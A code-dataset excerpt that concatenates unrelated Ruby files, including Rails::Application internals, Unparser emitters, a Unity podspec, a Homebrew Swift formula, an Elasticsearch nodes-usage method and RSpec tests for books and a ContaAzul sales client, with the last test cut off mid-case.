# on one of the applications to create a copy of the application which shares
# the configuration.
#
# If you decide to define Rake tasks, runners, or initializers in an
# application other than +Rails.application+, then you must run them manually.
class Application < Engine
autoload :Bootstrap, "rails/application/bootstrap"
autoload :Configuration, "rails/application/configuration"
autoload :DefaultMiddlewareStack, "rails/application/default_middleware_stack"
autoload :Finisher, "rails/application/finisher"
autoload :Railties, "rails/engine/railties"
autoload :RoutesReloader, "rails/application/routes_reloader"
class << self
def inherited(base)
super
Rails.app_class = base
add_lib_to_load_path!(find_root(base.called_from))
ActiveSupport.run_load_hooks(:before_configuration, base)
end
def instance
super.run_load_hooks!
end
def create(initial_variable_values = {}, &block)
new(initial_variable_values, &block).run_load_hooks!
end
def find_root(from)
find_root_with_flag "config.ru", from, Dir.pwd
end
# Makes the +new+ method public.
#
# Note that Rails::Application inherits from Rails::Engine, which
# inherits from Rails::Railtie and the +new+ method on Rails::Railtie is
# private
public :new
end
attr_accessor :assets, :sandbox
alias_method :sandbox?, :sandbox
attr_reader :reloaders, :reloader, :executor
delegate :default_url_options, :default_url_options=, to: :routes
INITIAL_VARIABLES = [:config, :railties, :routes_reloader, :reloaders,
:routes, :helpers, :app_env_config, :secrets] # :nodoc:
def initialize(initial_variable_values = {}, &block)
super()
@initialized = false
@reloaders = []
@routes_reloader = nil
@app_env_config = nil
@ordered_railties = nil
@railties = nil
@message_verifiers = {}
@ran_load_hooks = false
@executor = Class.new(ActiveSupport::Executor)
@reloader = Class.new(ActiveSupport::Reloader)
@reloader.executor = @executor
# are these actually used?
@initial_variable_values = initial_variable_values
@block = block
end
# Returns true if the application is initialized.
def initialized?
@initialized
end
def run_load_hooks! # :nodoc:
return self if @ran_load_hooks
@ran_load_hooks = true
@initial_variable_values.each do |variable_name, value|
if INITIAL_VARIABLES.include?(variable_name)
instance_variable_set("@#{variable_name}", value)
end
end
instance_eval(&@block) if @block
self
end
# Reload application routes regardless if they changed or not.
def reload_routes!
routes_reloader.reload!
end
# Returns the application's KeyGenerator
def key_generator
# number of iterations selected based on consultation with the google security
# team. Details at https://github.com/rails/rails/pull/6952#issuecomment-7661220
@caching_key_generator ||=
if secret_key_base
ActiveSupport::CachingKeyGenerator.new(
ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000)
)
else
ActiveSupport::LegacyKeyGenerator.new(secrets.secret_token)
end
end
# Returns a message verifier object.
#
# This verifier can be used to generate and verify signed messages in the application.
#
# It is recommended not to use the same verifier for different things, so you can get different
# verifiers passing the +verifier_name+ argument.
#
# ==== Parameters
#
# * +verifier_name+ - the name of the message verifier.
#
# ==== Examples
#
# message = Rails.application.message_verifier('sensitive_data').generate('my sensible data')
# Rails.application.message_verifier('sensitive_data').verify(message)
# # => 'my sensible data'
#
# See the +ActiveSupport::MessageVerifier+ documentation for more information.
def message_verifier(verifier_name)
@message_verifiers[verifier_name] ||= begin
secret = key_generator.generate_key(verifier_name.to_s)
ActiveSupport::MessageVerifier.new(secret)
end
end
# Convenience for loading config/foo.yml for the current Rails env.
#
# Example:
#
# # config/exception_notification.yml:
# production:
# url: http://127.0.0.1:8080
# namespace: my_app_production
# development:
# url: http://localhost:3001
# namespace: my_app_development
#
# # config/environments/production.rb
# Rails.application.configure do
# config.middleware.use ExceptionNotifier, config_for(:exception_notification)
# end
def config_for(name, env: Rails.env)
if name.is_a?(Pathname)
yaml = name
else
yaml = Pathname.new("#{paths["config"].existent.first}/#{name}.yml")
end
if yaml.exist?
require "erb"
(YAML.load(ERB.new(yaml.read).result) || {})[env] || {}
else
raise "Could not load configuration. No such file - #{yaml}"
end
rescue Psych::SyntaxError => e
raise "YAML syntax error occurred while parsing #{yaml}. " \
"Please note that YAML must be consistently indented using spaces. Tabs are not allowed. " \
"Error: #{e.message}"
end
# Stores some of the Rails initial environment parameters which
# will be used by middlewares and engines to configure themselves.
def env_config
@app_env_config ||= begin
super.merge(
"action_dispatch.parameter_filter" => config.filter_parameters,
"action_dispatch.redirect_filter" => config.filter_redirect,
"action_dispatch.secret_token" => secrets.secret_token,
"action_dispatch.secret_key_base" => secret_key_base,
"action_dispatch.show_exceptions" => config.action_dispatch.show_exceptions,
"action_dispatch.show_detailed_exceptions" => config.consider_all_requests_local,
"action_dispatch.logger" => Rails.logger,
"action_dispatch.backtrace_cleaner" => Rails.backtrace_cleaner,
"action_dispatch.key_generator" => key_generator,
"action_dispatch.http_auth_salt" => config.action_dispatch.http_auth_salt,
"action_dispatch.signed_cookie_salt" => config.action_dispatch.signed_cookie_salt,
"action_dispatch.encrypted_cookie_salt" => config.action_dispatch.encrypted_cookie_salt,
"action_dispatch.encrypted_signed_cookie_salt" => config.action_dispatch.encrypted_signed_cookie_salt,
"action_dispatch.authenticated_encrypted_cookie_salt" => config.action_dispatch.authenticated_encrypted_cookie_salt,
"action_dispatch.use_authenticated_cookie_encryption" => config.action_dispatch.use_authenticated_cookie_encryption,
"action_dispatch.encrypted_cookie_cipher" => config.action_dispatch.encrypted_cookie_cipher,
"action_dispatch.signed_cookie_digest" => config.action_dispatch.signed_cookie_digest,
"action_dispatch.cookies_serializer" => config.action_dispatch.cookies_serializer,
"action_dispatch.cookies_digest" => config.action_dispatch.cookies_digest,
"action_dispatch.cookies_rotations" => config.action_dispatch.cookies_rotations,
"action_dispatch.content_security_policy" => config.content_security_policy,
"action_dispatch.content_security_policy_report_only" => config.content_security_policy_report_only,
"action_dispatch.content_security_policy_nonce_generator" => config.content_security_policy_nonce_generator
)
end
end
# If you try to define a set of Rake tasks on the instance, these will get
# passed up to the Rake tasks defined on the application's class.
def rake_tasks(&block)
self.class.rake_tasks(&block)
end
# Sends the initializers to the +initializer+ method defined in the
# Rails::Initializable module. Each Rails::Application class has its own
# set of initializers, as defined by the Initializable module.
def initializer(name, opts = {}, &block)
self.class.initializer(name, opts, &block)
end
# Sends any runner called in the instance of a new application up
# to the +runner+ method defined in Rails::Railtie.
def runner(&blk)
self.class.runner(&blk)
end
# Sends any console called in the instance of a new application up
# to the +console+ method defined in Rails::Railtie.
def console(&blk)
self.class.console(&blk)
end
# Sends any generators called in the instance of a new application up
# to the +generators+ method defined in Rails::Railtie.
def generators(&blk)
self.class.generators(&blk)
end
# Sends the +isolate_namespace+ method up to the class method.
def isolate_namespace(mod)
self.class.isolate_namespace(mod)
end
## Rails internal API
# This method is called just after an application inherits from Rails::Application,
# allowing the developer to load classes in lib and use them during application
# configuration.
#
# class MyApplication < Rails::Application
# require "my_backend" # in lib/my_backend
# config.i18n.backend = MyBackend
# end
#
# Notice this method takes into consideration the default root path. So if you
# are changing config.root inside your application definition or having a custom
# Rails application, you will need to add lib to $LOAD_PATH on your own in case
# you need to load files in lib/ during the application configuration as well.
def self.add_lib_to_load_path!(root) #:nodoc:
path = File.join root, "lib"
if File.exist?(path) && !$LOAD_PATH.include?(path)
$LOAD_PATH.unshift(path)
end
end
def require_environment! #:nodoc:
environment = paths["config/environment"].existent.first
require environment if environment
end
def routes_reloader #:nodoc:
@routes_reloader ||= RoutesReloader.new
end
# Returns an array of file paths appended with a hash of
# directories-extensions suitable for ActiveSupport::FileUpdateChecker
# API.
def watchable_args #:nodoc:
files, dirs = config.watchable_files.dup, config.watchable_dirs.dup
ActiveSupport::Dependencies.autoload_paths.each do |path|
dirs[path.to_s] = [:rb]
end
[files, dirs]
end
# Initialize the application passing the given group. By default, the
# group is :default
def initialize!(group = :default) #:nodoc:
raise "Application has been already initialized." if @initialized
run_initializers(group, self)
@initialized = true
self
end
def initializers #:nodoc:
Bootstrap.initializers_for(self) +
railties_initializers(super) +
Finisher.initializers_for(self)
end
def config #:nodoc:
@config ||= Application::Configuration.new(self.class.find_root(self.class.called_from))
end
def config=(configuration) #:nodoc:
@config = configuration
end
# Returns secrets added to config/secrets.yml.
#
# Example:
#
# development:
# secret_key_base: 836fa3665997a860728bcb9e9a1e704d427cfc920e79d847d79c8a9a907b9e965defa4154b2b86bdec6930adbe33f21364523a6f6ce363865724549fdfc08553
# test:
# secret_key_base: 5a37811464e7d378488b0f073e2193b093682e4e21f5d6f3ae0a4e1781e61a351fdc878a843424e81c73fb484a40d23f92c8dafac4870e74ede6e5e174423010
# production:
# secret_key_base: <%= ENV["SECRET_KEY_BASE"] %>
# namespace: my_app_production
#
# +Rails.application.secrets.namespace+ returns +my_app_production+ in the
# production environment.
def secrets
@secrets ||= begin
secrets = ActiveSupport::OrderedOptions.new
files = config.paths["config/secrets"].existent
files = files.reject { |path| path.end_with?(".enc") } unless config.read_encrypted_secrets
secrets.merge! Rails::Secrets.parse(files, env: Rails.env)
# Fallback to config.secret_key_base if secrets.secret_key_base isn't set
secrets.secret_key_base ||= config.secret_key_base
# Fallback to config.secret_token if secrets.secret_token isn't set
secrets.secret_token ||= config.secret_token
if secrets.secret_token.present?
ActiveSupport::Deprecation.warn(
"`secrets.secret_token` is deprecated in favor of `secret_key_base` and will be removed in Rails 6.0."
)
end
secrets
end
end
def secrets=(secrets) #:nodoc:
@secrets = secrets
end
# The secret_key_base is used as the input secret to the application's key generator, which in turn
# is used to create all MessageVerifiers/MessageEncryptors, including the ones that sign and encrypt cookies.
#
# In test and development, this is simply derived as an MD5 hash of the application's name.
#
# In all other environments, we look for it first in ENV["SECRET_KEY_BASE"],
# then credentials.secret_key_base, and finally secrets.secret_key_base. For most applications,
# the correct place to store it is in the encrypted credentials file.
def secret_key_base
if Rails.env.development? || Rails.env.test?
secrets.secret_key_base ||= generate_development_secret
else
validate_secret_key_base(
ENV["SECRET_KEY_BASE"] || credentials.secret_key_base || secrets.secret_key_base
)
end
end
# Decrypts the credentials hash as kept in +config/credentials.yml.enc+. This file is encrypted with
# the Rails master key, which is either taken from <tt>ENV["RAILS_MASTER_KEY"]</tt> or from loading
# +config/master.key+.
def credentials
@credentials ||= encrypted("config/credentials.yml.enc")
end
# Shorthand to decrypt any encrypted configurations or files.
#
# For any file added with <tt>bin/rails encrypted:edit</tt> call +read+ to decrypt
# the file with the master key.
# The master key is either stored in +config/master.key+ or <tt>ENV["RAILS_MASTER_KEY"]</tt>.
#
# Rails.application.encrypted("config/mystery_man.txt.enc").read
# # => "We've met before, haven't we?"
#
# It's also possible to interpret encrypted YAML files with +config+.
#
# Rails.application.encrypted("config/credentials.yml.enc").config
# # => { next_guys_line: "I don't think so. Where was it you think we met?" }
#
# Any top-level configs are also accessible directly on the return value:
#
# Rails.application.encrypted("config/credentials.yml.enc").next_guys_line
# # => "I don't think so. Where was it you think we met?"
#
# The files or configs can also be encrypted with a custom key. To decrypt with
# a key in the +ENV+, use:
#
# Rails.application.encrypted("config/special_tokens.yml.enc", env_key: "SPECIAL_TOKENS")
#
# Or to decrypt with a file, that should be version control ignored, relative to +Rails.root+:
#
# Rails.application.encrypted("config/special_tokens.yml.enc", key_path: "config/special_tokens.key")
def encrypted(path, key_path: "config/master.key", env_key: "RAILS_MASTER_KEY")
ActiveSupport::EncryptedConfiguration.new(
config_path: Rails.root.join(path),
key_path: Rails.root.join(key_path),
env_key: env_key,
raise_if_missing_key: config.require_master_key
)
end
def to_app #:nodoc:
self
end
def helpers_paths #:nodoc:
config.helpers_paths
end
console do
require "pp"
end
console do
unless ::Kernel.private_method_defined?(:y)
require "psych/y"
end
end
# Return an array of railties respecting the order they're loaded
# and the order specified by the +railties_order+ config.
#
# While running initializers we need engines in reverse order here when
# copying migrations from railties ; we need them in the order given by
# +railties_order+.
def migration_railties # :nodoc:
ordered_railties.flatten - [self]
end
protected
alias :build_middleware_stack :app
def run_tasks_blocks(app) #:nodoc:
railties.each { |r| r.run_tasks_blocks(app) }
super
require "rails/tasks"
task :environment do
ActiveSupport.on_load(:before_initialize) { config.eager_load = false }
require_environment!
end
end
def run_generators_blocks(app) #:nodoc:
railties.each { |r| r.run_generators_blocks(app) }
super
end
def run_runner_blocks(app) #:nodoc:
railties.each { |r| r.run_runner_blocks(app) }
super
end
def run_console_blocks(app) #:nodoc:
railties.each { |r| r.run_console_blocks(app) }
super
end
# Returns the ordered railties for this application considering railties_order.
def ordered_railties #:nodoc:
@ordered_railties ||= begin
order = config.railties_order.map do |railtie|
if railtie == :main_app
self
elsif railtie.respond_to?(:instance)
railtie.instance
else
railtie
end
end
all = (railties - order)
all.push(self) unless (all + order).include?(self)
order.push(:all) unless order.include?(:all)
index = order.index(:all)
order[index] = all
order
end
end
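# For example (illustrative), with:
#
#   config.railties_order = [Blog::Engine, :main_app, :all]
#
# Blog::Engine is considered before the application itself, and every
# remaining railtie takes the place of the :all placeholder.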
def railties_initializers(current) #:nodoc:
initializers = []
ordered_railties.reverse.flatten.each do |r|
if r == self
initializers += current
else
initializers += r.initializers
end
end
initializers
end
def default_middleware_stack #:nodoc:
default_stack = DefaultMiddlewareStack.new(self, config, paths)
default_stack.build_stack
end
def validate_secret_key_base(secret_key_base)
if secret_key_base.is_a?(String) && secret_key_base.present?
secret_key_base
elsif secret_key_base
raise ArgumentError, "`secret_key_base` for #{Rails.env} environment must be a String"
elsif secrets.secret_token.blank?
raise ArgumentError, "Missing `secret_key_base` for '#{Rails.env}' environment, set this string with `rails credentials:edit`"
end
end
private
def generate_development_secret
if secrets.secret_key_base.nil?
key_file = Rails.root.join("tmp/development_secret.txt")
if !File.exist?(key_file)
random_key = SecureRandom.hex(64)
FileUtils.mkdir_p(key_file.dirname)
File.binwrite(key_file, random_key)
end
secrets.secret_key_base = File.binread(key_file)
end
secrets.secret_key_base
end
def build_request(env)
req = super
env["ORIGINAL_FULLPATH"] = req.fullpath
env["ORIGINAL_SCRIPT_NAME"] = req.script_name
req
end
def build_middleware
config.app_middleware + super
end
end
end
| 36.563813 | 157 | 0.682278 |
260af9be0fdfeb778529bee0d402617347ada583 | 4,906 | # frozen_string_literal: true
module Unparser
class Emitter
# Arg expr (pattern args) emitter
class ArgExpr < self
handle :arg_expr
children :body
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
visit_parentheses(body)
end
end # ArgExpr
# Arguments emitter
class Arguments < self
include Terminated
handle :args
SHADOWARGS = ->(node) { node.type.equal?(:shadowarg) }.freeze
ARG = ->(node) { node.type.equal?(:arg) }.freeze
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
delimited(normal_arguments)
write(', ') if procarg_disambiguator?
return if shadowargs.empty?
write('; ')
delimited(shadowargs)
end
# Test for procarg_disambiguator
#
# @return [Boolean]
#
# @api private
#
def procarg_disambiguator?
regular_block? && normal_arguments.all?(&ARG) && normal_arguments.one?
end
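# Round-trip rationale (based on the parser gem's AST): `proc { |a| }`
# parses as a procarg0 node, while `proc { |a,| }` parses as
# s(:args, s(:arg, :a)). Writing the trailing comma above keeps a single
# plain block argument from being re-parsed as a procarg0.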
# Test for regular block
#
# @return [Boolean]
#
# @api private
#
def regular_block?
parent_type.equal?(:block) && !parent.node.children.first.type.equal?(:lambda)
end
# Return normal arguments
#
# @return [Enumerable<Parser::AST::Node>]
#
# @api private
#
def normal_arguments
children.reject(&SHADOWARGS)
end
memoize :normal_arguments
# Return shadow args
#
# @return [Enumerable<Parser::AST::Node>]
#
# @api private
#
def shadowargs
children.select(&SHADOWARGS)
end
memoize :shadowargs
end # Arguments
# Emitter for block and kwrestarg arguments
class Morearg < self
include Terminated
MAP = {
blockarg: T_AMP,
kwrestarg: T_DSPLAT
}.freeze
handle :blockarg
handle :kwrestarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(MAP.fetch(node_type), name.to_s)
end
end # Blockarg
# Optional argument emitter
class Optarg < self
include Terminated
handle :optarg
children :name, :value
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s, WS, T_ASN, WS)
visit(value)
end
end
# Optional keyword argument emitter
class KeywordOptional < self
include Terminated
handle :kwoptarg
children :name, :value
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s, T_COLON, WS)
visit(value)
end
end # KeywordOptional
# Keyword argument emitter
class Kwarg < self
include Terminated
handle :kwarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s, T_COLON)
end
end # Restarg
# Rest argument emitter
class Restarg < self
include Terminated
handle :restarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(T_SPLAT, name.to_s)
end
end # Restarg
# Argument emitter
class Argument < self
include Terminated
handle :arg, :shadowarg
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(name.to_s)
end
end # Argument
# Progarg emitter
class Procarg < self
include Terminated
handle :procarg0
PARENS = %i[restarg mlhs].freeze
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
if needs_parens?
parentheses do
delimited(children)
end
else
delimited(children)
end
end
def needs_parens?
children.length > 1 || children.any? do |node|
PARENS.include?(node.type)
end
end
end
# Block pass node emitter
class BlockPass < self
include Terminated
handle :block_pass
children :name
private
# Perform dispatch
#
# @return [undefined]
#
# @api private
#
def dispatch
write(T_AMP)
visit(name)
end
end # BlockPass
end # Emitter
end # Unparser
| 16.630508 | 86 | 0.53832 |
01736ef09d5eb1706514c174ca6b2e0c349dc3ef | 1,653 | Pod::Spec.new do |spec|
spec.name = "UnityMediationSdk"
spec.version = '0.2.1'
spec.summary = "Unity Mediation SDK"
spec.description = "UnityMediationSdk Framework containing protobuf objc files for communicating with the instantiation service."
spec.homepage = "https://github.com/Unity-Technologies/mz-mediation-sdk-ios"
spec.license = { :type => 'Unity Monetization Services', :text => <<-LICENSE
Unity Monetization copyright © 2020 Unity Technologies SF
Your use of the Unity Technologies SF ("Unity") services known as "Unity Monetization" is subject to the Unity Monetization Services Terms of Service linked to and copied immediately below.
[Unity Monetization Services TOS](https://unity3d.com/legal/monetization-services-terms-of-service)
Your use of Unity Monetization constitutes your acceptance of such terms. Unless expressly provided otherwise, the software under this license is made available strictly on an "AS IS" BASIS WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. Please review the license for details on these and other terms and conditions.
LICENSE
}
spec.author = { "Shawn Hampton" => "[email protected]" }
spec.platform = :ios, "9.0"
spec.source = { :http => "https://unity3ddist.jfrog.io/artifactory/unity-mediation-generic-prod-local/UnityMediationSdk/0.2.1/UnityMediationSdk.xcframework.zip" }
spec.vendored_frameworks = "UnityMediationSdk.xcframework"
spec.frameworks = "SystemConfiguration", "AppTrackingTransparency", "AdSupport", "WebKit"
spec.dependency "Protobuf", "~> 3.12.0"
end
| 71.869565 | 320 | 0.722928 |
1df50ef2b52f515c301031c3e1c3ba6d0d4da9c2 | 878 | require 'rails_helper'
RSpec.describe "books/show", type: :view do
before(:each) do
@book = assign(:book, Book.create!(
title: "Title",
description: "MyText",
edition: 2,
pages: 3,
format: "Format",
price: 4,
quantity: 5,
available: false,
author: nil,
category: nil,
publisher: nil,
user: nil
))
end
it "renders attributes in <p>" do
render
expect(rendered).to match(/Title/)
expect(rendered).to match(/MyText/)
expect(rendered).to match(/2/)
expect(rendered).to match(/3/)
expect(rendered).to match(/Format/)
expect(rendered).to match(/4/)
expect(rendered).to match(/5/)
expect(rendered).to match(/false/)
expect(rendered).to match(//)
expect(rendered).to match(//)
expect(rendered).to match(//)
expect(rendered).to match(//)
end
end
| 23.72973 | 43 | 0.59795 |
e28a8abc3da8b25eb0919e55aceb94817460ffff | 389 | class Invitation < ApplicationRecord
include Invitations::Core
# 🚅 add concerns above.
# 🚅 add belongs_to associations above.
# 🚅 add has_many associations above.
# 🚅 add oauth providers above.
# 🚅 add has_one associations above.
# 🚅 add scopes above.
# 🚅 add validations above.
# 🚅 add callbacks above.
# 🚅 add delegations above.
# 🚅 add methods above.
end
| 16.913043 | 40 | 0.678663 |
28d7f806a27e70a03e85a0fac630813724d96df9 | 3,526 | class Swift < Formula
desc "High-performance system programming language"
homepage "https://github.com/apple/swift"
url "https://github.com/apple/swift/archive/swift-2.2-SNAPSHOT-2015-12-18-a.tar.gz"
version "2.2-SNAPSHOT-2015-12-18-a"
sha256 "2ff6c780f1768e410e444915d6830048025a7f353c9a4bc30456bbd40ad33951"
stable do
swift_tag = "swift-#{version}"
resource "cmark" do
url "https://github.com/apple/swift-cmark/archive/0.22.0.tar.gz"
sha256 "7fa11223b9a29a411fbc440aba2a756ccc8b6228d8c2b367e8f568968e3eb569"
end
resource "clang" do
url "https://github.com/apple/swift-clang/archive/#{swift_tag}.tar.gz"
sha256 "a626feb26119cde3f9df15549d8a53028c704c5deba5e84b60ba434398a529da"
end
resource "llvm" do
url "https://github.com/apple/swift-llvm/archive/#{swift_tag}.tar.gz"
sha256 "6d69cd1ea9bb830bc7f21a80c30d5be29e55878b9f9f46ef4faa2fd02d36b160"
end
end
bottle do
sha256 "d6702f2d52b0f570c3851e88605529e3102df8b3bf243d8c8db0cbe18b63d027" => :el_capitan
sha256 "6d5ed861ec71459e6671a534f52e0e449e9025bdad1a6faab6dc3bc843aa4af8" => :yosemite
end
head do
url "https://github.com/apple/swift"
resource "cmark" do
url "https://github.com/apple/swift-cmark.git"
end
resource "clang" do
url "https://github.com/apple/swift-clang.git", :branch => "stable"
end
resource "llvm" do
url "https://github.com/apple/swift-llvm.git", :branch => "stable"
end
end
keg_only :provided_by_osx, "Apple's CLT package contains Swift."
depends_on "cmake" => :build
depends_on "ninja" => :build
depends_on :xcode => ["7.0", :build]
def install
workspace = buildpath.parent
build = workspace/"build"
ln_sf buildpath, "#{workspace}/swift"
resources.each { |r| r.stage("#{workspace}/#{r.name}") }
mkdir build do
system "#{buildpath}/utils/build-script-impl",
"--build-dir=#{build}",
"--cmark-build-type=Release",
"--llvm-build-type=Release",
"--swift-build-type=Release",
"--swift-stdlib-build-type=Release",
"--lldb-build-type=Release",
"--llvm-enable-assertions=false",
"--swift-enable-assertions=false",
"--swift-stdlib-enable-assertions=false",
"--cmake-generator=Ninja",
"--workspace=#{workspace}",
"--skip-test-cmark",
"--skip-test-lldb",
"--skip-test-swift",
"--skip-test-llbuild",
"--skip-test-swiftpm",
"--skip-test-xctest",
"--skip-test-foundation",
"--skip-test-validation",
"--skip-test-optimized",
"--skip-build-lldb",
"--skip-build-llbuild",
"--skip-build-swiftpm",
"--skip-build-xctest",
"--skip-build-foundation",
"--build-args=-j#{ENV.make_jobs}",
"--lldb-use-system-debugserver",
"--install-prefix=#{prefix}",
"--skip-ios",
"--skip-tvos",
"--skip-watchos",
"--darwin-deployment-version-osx=#{MacOS.version}",
"--build-jobs=#{ENV.make_jobs}"
end
bin.install "#{build}/swift-macosx-x86_64/bin/swift",
"#{build}/swift-macosx-x86_64/bin/swiftc"
(lib/"swift").install "#{build}/swift-macosx-x86_64/lib/swift/macosx/",
"#{build}/swift-macosx-x86_64/lib/swift/shims/"
end
test do
(testpath/"test.swift").write 'print("test")'
system "#{bin}/swiftc", "test.swift"
assert_equal "test\n", shell_output("./test")
end
end
| 32.348624 | 92 | 0.632728 |
e9a6ab006abb8d3efd8cc583cba933bc27615440 | 270 | class ParticipantSerializer < ActiveModel::Serializer
attributes :id, :email, :first_name, :last_name, :status
has_many :case_notes
has_many :paperworks
has_many :studio_assessments
has_one :personal_questionnaire
has_one :professional_questionnaire
end
| 20.769231 | 58 | 0.8 |
f7ee39a17555e896ddaba6b8a9eed215507acb23 | 214 | class AddDefaultValueToIsActive < ActiveRecord::Migration
def up
change_column :users, :is_active, :boolean, :default => true
end
def down
change_column :users, :is_active, :boolean, :default => nil
end
end
| 21.4 | 62 | 0.752336 |
6a20fdb441a02c7306fee306542e96c0443a4592 | 2,665 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Nodes
module Actions
# Returns low-level information about REST actions usage on nodes.
#
# @option arguments [List] :node_id A comma-separated list of node IDs or names to limit the returned information; use `_local` to return information from the node you're connecting to, leave empty to get information from all nodes
# @option arguments [List] :metric Limit the information returned to the specified metrics (options: _all, rest_actions)
# @option arguments [Time] :timeout Explicit operation timeout
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-usage.html
#
def usage(arguments = {})
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
_node_id = arguments.delete(:node_id)
_metric = arguments.delete(:metric)
method = Elasticsearch::API::HTTP_GET
path = if _node_id && _metric
"_nodes/#{Utils.__listify(_node_id)}/usage/#{Utils.__listify(_metric)}"
elsif _node_id
"_nodes/#{Utils.__listify(_node_id)}/usage"
elsif _metric
"_nodes/usage/#{Utils.__listify(_metric)}"
else
"_nodes/usage"
end
params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)
body = nil
perform_request(method, path, params, body, headers).body
end
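# Example call (client object assumed):
#
#   client.nodes.usage(node_id: '_local', metric: 'rest_actions')
#   # => GET _nodes/_local/usage/rest_actions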
# Register this action with its valid params when the module is loaded.
#
# @since 6.2.0
ParamsRegistry.register(:usage, [
:timeout
].freeze)
end
end
end
end
| 40.378788 | 239 | 0.654784 |
b94a22bf81edceb9ebec27da8454e25570fb84ac | 5,805 | RSpec.describe ContaAzulApi::Sale do
before do
stub_request(:post, %r{https://api.contaazul.com/oauth2/token}).
to_return(status: 200, body: File.read('spec/fixtures/refresh_oauth_token.json'))
stub_const('CaAuthHistory', FakeCaAuthHistory)
logger = double(:logger, info: '')
allow(Rails).to receive(:logger).and_return(logger)
end
describe '.find' do
it 'returns a sale based on provided id' do
stub_request(:get, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 200, body: File.read('spec/fixtures/sales_endpoints/find_by_id.json'))
sale = ContaAzulApi::Sale.find('c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale.id).to eq('c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale.number).to eq(12)
expect(sale.total).to eq(50)
end
it 'raises an error when sale is not found' do
stub_request(:get, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 404, body: 'Sale not found with the specified id')
expect {
ContaAzulApi::Sale.find('c7288c09-829d-48b9-aee2-4f744e380587')
}.to raise_exception(ContaAzulApi::Sale::NotFound)
end
end
describe '.filter_by' do
it 'returns sales based on provided filters' do
stub_request(:get, "https://api.contaazul.com/v1/sales?emission_start=2020-10-13&size=1").
to_return(status: 200, body: File.read('spec/fixtures/sales_endpoints/filter_by.json'))
sales = ContaAzulApi::Sale.filter_by(emission_start: '2020-10-13', size: 1)
expect(sales).to be_an(Array)
expect(sales.length).to eq 1
sale = sales.first
expect(sale.id).to eq('c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale.number).to eq(12)
expect(sale.total).to eq(50)
end
it 'raises an error when sale is not found' do
stub_request(:get, "https://api.contaazul.com/v1/sales?emission_start=2020-10-13&size=1").
to_return(status: 404, body: 'Sales not found with the specified filters')
expect {
ContaAzulApi::Sale.filter_by(emission_start: '2020-10-13', size: 1)
}.to raise_exception(ContaAzulApi::Sale::NotFound)
end
end
describe 'list_items' do
it 'returns items from a sale' do
stub_request(:get, 'https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587/items').
to_return(status: 200, body: File.read('spec/fixtures/sales_endpoints/list_items.json'))
items = ContaAzulApi::Sale.list_items('c7288c09-829d-48b9-aee2-4f744e380587')
expect(items.size).to eq(1)
expect(items.first['description']).to eq('Game Atari ET')
expect(items.first['value']).to eq(0)
end
it 'raises an error when sale is not found' do
stub_request(:get, 'https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587/items').
to_return(status: 404, body: File.read('spec/fixtures/sales_endpoints/list_items.json'))
expect {
ContaAzulApi::Sale.list_items('c7288c09-829d-48b9-aee2-4f744e380587')
}.to raise_exception(ContaAzulApi::Sale::NotFound)
end
end
describe '.create' do
it 'creates a sale when valid data is provided' do
sales_params = {
number: 1234,
emission: '2019-12-27T16:55:06.343Z',
status: 'COMMITTED',
customer_id: 'c7288c09-829d-48b9-aee2-4f744e380587',
products: [
{
description: "Game Atari ET",
quantity: 2,
product_id: "f8ffb77a-3d52-42d7-9bec-ea38c0ef043d",
value: 50
}
],
payment: {
type: 'CASH'
},
notes: 'PP2'
}
ContaAzulApi::Helpers.stub_create_sale(
payload: sales_params,
body: JSON.parse(File.read('spec/fixtures/sales_endpoints/create.json'))
)
new_sale = ContaAzulApi::Sale.create(sales_params.as_json)
expect(new_sale.id).to eq('c7288c09-829d-48b9-aee2-4f744e380587')
end
it 'raises error when sale is not created' do
ContaAzulApi::Helpers.stub_create_sale(status: 422)
expect {
ContaAzulApi::Sale.create({}.as_json)
}.to raise_exception(ContaAzulApi::Sale::NotCreated)
end
end
describe '.delete' do
it 'removes a sale based on provided id' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 204, body: 'Sale deleted')
sale_removed = ContaAzulApi::Sale.delete(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
expect(sale_removed).to be_truthy
end
it 'does not remove a sale when they are not found' do
stub_request(:delete, "https://api.contaazul.com/v1/sales/c7288c09-829d-48b9-aee2-4f744e380587").
to_return(status: 404, body: 'Sale not found with specified id')
sale_removed = ContaAzulApi::Sale.delete(id: 'c7288c09-829d-48b9-aee2-4f744e380587')
